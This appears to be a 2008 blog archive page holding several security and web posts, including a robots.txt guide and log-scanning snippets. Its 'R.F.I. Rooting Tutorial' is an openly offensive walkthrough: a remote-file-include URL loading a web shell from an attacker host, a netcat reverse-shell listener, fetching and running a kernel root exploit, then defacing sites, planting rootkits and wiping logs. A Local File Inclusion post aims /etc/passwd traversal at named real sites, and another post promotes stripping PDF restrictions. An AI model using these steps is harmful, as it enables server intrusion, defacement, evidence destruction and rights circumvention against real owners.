techian.com

A Blog With No Limits

Archive for September, 2008

Removing restrictions from pdf file

Posted on September 2, 2008 by admin | No Comments

Remove restriction from pdf file


How to remove restrictions from PDF files [like print option disabled etc.]

Today I downloaded a PDF file of 38 MB size, but when I tried to print it, the print option was disabled. I tried to remove the restriction by means of converting the file to DOC, but it was not getting converted. I googled for restriction removal software, but they all were asking for $. So finally Google helped me and I found a software [freeware] which worked.

download link:
Actually it makes a copy of the file whose restrictions are to be removed in the same folder. Then you will have a duplicate file [a copy] with no restrictions at all. I saved 1600 Rs. by that downloaded document and 24$ for not purchasing a restriction removal tool and using this freeware. Thank god!!


Test your popup blocker software

Posted on September 2, 2008 by admin | No Comments

PopupTest.com provides a simple and independent source for popup window testing. Whether you are developing a popup killer software or you are thinking about purchasing one, you can use our sample popups to test the effectiveness of the application.
We are providing samples of the most common popup styles, as well as some not so common ones (as indicated).


Common popup techniques

Multi-PopUp Test
This page launches 10 popup windows, using different techniques…

Multi-PopUp Test #2
This page launches 4 popup windows, using different techniques…

Come & Go Test
This page launches 2 popups when you enter, and an additional one when you leave.

Timed PopUp
This page launches a new popup every 5 seconds…

Mouseover PopUp
Hold your mouse over the text and you’ll see 2 popup windows.

Less common popup techniques

Floating popup
Very annoying, won’t go away until you do…

Channel Opener
Opens a full-screen channel mode window in IE…

Modeless Window
Stays on top until closed…

Full screen trap
Very nasty! In IE, this one opens full screen, and the only way out is to press Alt+F4 to close it.

Drop down Popup
This one drops into your face from the top of the page…

Floating banner
An animated airplane that grabs an existing banner ad and flies it around the screen… not really a true popup.

Chromeless
A non-standard, borderless popup window…

Sticky popup
This popup floats in the upper right corner like a sticky note…

High-tech popup and floating media
These techniques are too involved to use local samples, so we are linking to a real web site that uses them instead. Some of these are pretty cool actually, and not nearly as annoying as the common ones.

EyeBlaster
BlueLayer
TangoZebra Overlays

Not all popups are bad…
but some popup killers are not smart enough to recognize that!

This page has some links that produce popup windows when clicked. A good popup blocker should ignore these and let you open the windows…
Click here

more to come!


Robots.txt harmless? Or dangerous?

Posted on September 1, 2008 by admin | No Comments

Robots.txt harmless? Or dangerous?
By K1u

So alright… what is this strange file in the root of your directories, you ask?

Let me break down what it is: basically, it is a rule set for search engines.

Example of a robots.txt file.

# This is my robots.txt file!
User-agent: *
Disallow: /idontwantthisindexedbysearchengines/

Now let me explain what it is line by line.

# This is a User agent… example Firefox or Konqueror, * is anything.
User-agent: *

# This is a rule for search engines not to index this folder.
Disallow: /idontwantthisindexedbysearchengines/

Now let's talk about why robots.txt can be dangerous.

All websites out there that are using the robots file most likely have it exposed: it is publicly readable, so anyone can see the paths it lists.

Here, take this – http://k0h.org/robots.txt

Well, you're probably asking what to do now. Instead of keeping your “private” things in folders directly under the root, make a new folder named something like 021873257923, then store the other folder in there. Note… never ever store very important things on your webserver, even if it's protected by robots.txt.

Now let's build our own robots.txt file.

# This is a comment… these are ignored.
User-agent: *
Disallow: /273432087423374242/

User-agent: Googlebot-Image
Disallow: /images

# Alexa’s bot is a bit aggressive so I think I shall make it wait 1 minute (60 seconds) until it can view another page.
User-agent: IA_Archiver
Crawl-Delay: 60

Questions!

Ok… see, I have over 300 folders starting with admin… none should be indexed… what do I do? Is there some sort of wildcard I can use?

Simply Disallow: /admin without the ending /.

Are there engines that do not obey robots.txt?

Yep.

My host disallows Robots.txt…

They probably don’t… you just have not tried selecting "view hidden files" in your FTP client. Look into other methods… Google is your friend.

On a side note: I have not written this in the official tutorial, but a lot of people asked me why make a directory named 349823423423, for instance. The answer is that it is harder for script kiddies to do a directory name brute force on your site and find out your private directory's name.
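
An added Python example (not part of K1u's tutorial) for checking your own robots.txt: it lists Disallow paths whose names give away what they hide, and uses the standard library's urllib.robotparser to show which paths a compliant crawler skips, including the prefix behaviour of Disallow: /admin. The /backup-db/ rule, the word list and the ExampleBot name are constructed for illustration.

```python
from urllib.robotparser import RobotFileParser

# The robots.txt built in the tutorial, plus the /admin prefix rule from the
# Q&A and one descriptive path (/backup-db/) constructed for this example.
ROBOTS_TXT = """\
# This is a comment
User-agent: *
Disallow: /273432087423374242/
Disallow: /admin
Disallow: /backup-db/

User-agent: Googlebot-Image
Disallow: /images

User-agent: IA_Archiver
Crawl-Delay: 60
"""

# Assumed word list: names that tell a human reader what a folder contains.
REVEALING = ("admin", "backup", "private", "secret", "config")

def disclosed_paths(text):
    """Return Disallow paths whose names describe what is behind them."""
    hits = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        field, _, value = line.partition(":")
        path = value.strip()
        if field.strip().lower() == "disallow" and path:
            if any(word in path.lower() for word in REVEALING):
                hits.append(path)
    return hits

def blocked_for(text, agent, paths):
    """Map each path to True if a compliant crawler named `agent` must skip it."""
    parser = RobotFileParser()
    parser.parse(text.splitlines())
    return {path: not parser.can_fetch(agent, path) for path in paths}

if __name__ == "__main__":
    print("revealing:", disclosed_paths(ROBOTS_TXT))
    print(blocked_for(ROBOTS_TXT, "ExampleBot", ["/admin123/", "/administrator/", "/about/"]))
    print(blocked_for(ROBOTS_TXT, "Googlebot-Image", ["/images/a.png", "/admin123/"]))
```

Googlebot-Image is allowed into /admin123/ here: a crawler that has its own group follows only that group, not the * rules.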


R.F.I. Rooting Tutorial

Posted on September 1, 2008 by admin | No Comments

=======================================================================
R.F.I. Rooting Tutorial (Linux Server and Safe Mode: OFF)

Author: An@sA_StAxtH
Mail/MSN: admin@cyberanarchy.org/anasa_staxth@hotmail.com

For Cyber Anarchy (Nov. 2007)
=======================================================================

You will need:

- A site vulnerable to R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

The aim of this tutorial is to give a very general picture of the process of
rooting a Linux server with Safe Mode: OFF.

-

Suppose that we have found a site with R.F.I. vulnerability:

http://www.hackedsite.com/folder/index.html?page=

We can run a shell by exploiting Remote File Inclusion, as follows:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

where evilscript.txt is our web shell that we have already uploaded to
our site (www.mysite.com, in the folder: shells).

After we enter the shell, first of all we will see the version of the kernel
at the top of the page, or by typing uname -a in the command line.

To continue we must connect to the box with a back-connection. This can be done
in two ways if we have a suitable shell.

We can use the Back-Connect module of the r57/c99 shell, or upload a backconnector
to a writable folder.

Most shells have a back-connection feature, so there is no need to upload the
Connect Back Shell (or another shell in perl/c). We will analyze the first
way, which is inside the shell (in our example the shell is r57).

Initially we open NetCat and set it to listen on a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) in the
following way:

We will type: 11457 in the port input (this is the default port for the last versions
of the r57 shell). We can also use another port.

In Windows we press Start -> Run -> and we type: cmd
After that we go to the NetCat directory:

e.g.

cd C:\Program Files\Netcat

And we type the following command:

nc -n -l -v -p 11457

NetCat responds: listening on [any] 11457 ...

In the central page of the r57 shell we find under the following menu::: Net:: and
back-connect. In the IP form we will type our IP (www.cmyip.com to see our IP if
we have a dynamic one).

In the Port form we will put the port that we opened and that NetCat listens on.

If we press connect the shell will respond:

Now script try connect to  port 11457 ...

If our settings are correct NetCat will give us a shell on the server.

Now we will continue to the rooting process.

We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root privileges on the box. Depending on the version
of the Linux kernel there are different exploits. Sometimes the exploits fail to run
because some boxes are patched or we don't have the correct permissions.

List of the exploits/kernel:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites where we can find Local Root Exploits:

www.milw0rm (Try Search: "linux kernel")

Other sites: www.packetstormsecurity.org | www.arblan.com
or try Googlin' you can find 'em all ;-) 

We can find writable folders/files by typing:

find / -perm -2 -ls

We can use the /tmp folder which is a standard writable folder

We type: cd /tmp

To download the local root exploit we can use a download command for linux like
wget.

For example:

wget http://www.arblan.com/localroot/h00lyshit.c

where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit.

After the download we must compile the exploit (read the instructions of the exploit
before compiling).

For the h00lyshit we must type:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:

./h00lyshit

We need a very big file on the disk in order to run successfully and to get root.

We must create a big file in /tmp or into another writable folder.

The command is:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation

If this command fails we can try:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can proceed to the last step. We can run the exploit by typing:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(if we are in a different writable folder and the largefile was created in /tmp)

If there are no runtime errors (maybe the kernel is patched, or something is wrong with
the exploit run or the large file) we will get root.

To check if we got root:

id or

whoami

If it says root, we got root!

Now we can deface/mass deface all the sites of the server, or set up a rootkit (e.g.
SSHDoor) and take ssh/telnet shell access to the server.

To be safe we must erase all logs with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.

-


Local File Inclusion Tutorial

Posted on September 1, 2008 by admin | 1 Comment

Local File Inclusion Tutorial - Written by Xasulrev

[- How to Find LFI Vulnerability -]

How to find an LFI vulnerability: well, I make use of adding ..
Example:

www.site.com/index.php?p=..

Real World Examples:

http://www.jedit.org/index.php?page=..

Warning: main(...html): failed to open stream: No such file or directory in /home/groups/j/je/jedit/htdocs/index.php on line 63

Warning: main(): Failed opening '...html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.php on line 63

This is not vulnerable.
A vulnerable one should look like:

Warning: include() [function.include]: Failed opening '...php' for inclusion (include_path='.:/usr/share/pear') in /home/shiner/shiner.com/htdocs/beers/beers-home.php on line 62

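include is the function the script is using, for example:

<?php
// Vulnerable on purpose: the request parameter goes straight into include().
$page = $_GET['page'];
include($page);
?>

This should show [function.include],
but

<?php
// Same flaw with require_once(): the parameter is used as the file path.
$page = $_GET['page'];
require_once($page);
?>

should show [function.require_once] or [function.require].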

[- Find Example (Real) -]

http://www.crew4sea.com/indexm.php?url=..

Gives us.

Fatal error: require_once() [function.require]: Failed opening required './..' (include_path='.:/:/usr/php/pear') in /indexm.php on line 164

[function.require]

So we know it is vulnerable.

If it is a Windows OS, you can just do

http://www.crew4sea.com/indexm.php?url=indexm.php

Otherwise try

http://www.crew4sea.com/indexm.php?url=/etc/passwd

http://www.crew4sea.com/indexm.php?url=/etc/passwd

http://www.crew4sea.com/indexm.php?url=../etc/passwd

http://www.crew4sea.com/indexm.php?url=../etc/passwd

until you get Something.
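
How the request shapes from the R.F.I. and L.F.I. tutorials above show up in a web server access log, as an added Python example that is not part of the original posts: it flags query parameters whose decoded value is a remote URL or a path-traversal string. The log lines are constructed, and the combined log format and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed access-log lines (combined log format) modelled on the request
# shapes in the two tutorials; client addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Sep/2008:10:00:01 +0000] "GET /folder/index.html?page=http://www.mysite.com/shells/evilscript.txt? HTTP/1.1" 200 5120
203.0.113.5 - - [01/Sep/2008:10:00:09 +0000] "GET /indexm.php?url=..%2Fetc%2Fpasswd HTTP/1.1" 200 312
198.51.100.7 - - [01/Sep/2008:10:01:00 +0000] "GET /index.php?page=news HTTP/1.1" 200 2048
198.51.100.9 - - [01/Sep/2008:10:02:00 +0000] "GET /indexm.php?url=/etc/passwd HTTP/1.1" 500 0
198.51.100.9 - - [01/Sep/2008:10:02:05 +0000] "GET /index.php?p=%252e%252e HTTP/1.1" 200 97
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.I)            # page=http://...
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)|^/etc/')   # .., ../x, /etc/...

def fully_decode(value, rounds=3):
    # Undo nested percent-encoding (%252e -> %2e -> .) in a bounded number of passes.
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(value):
    """Return a finding label for one query-parameter value, or None."""
    value = fully_decode(value)
    if REMOTE_RE.search(value):
        return "remote-include"
    if TRAVERSAL_RE.search(value) or "\x00" in value:
        return "path-traversal"
    return None

def scan(log_text):
    """Return (client, parameter, label, status) for each suspicious parameter."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format; skip it
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        query = target.partition("?")[2]
        for name, value in parse_qsl(query, keep_blank_values=True):
            label = classify(value)
            if label:
                findings.append((client, name, label, status))
    return findings

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A hit with status 200 on a page that normally returns a PHP warning or error for such input deserves a look first, since the include may have succeeded.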
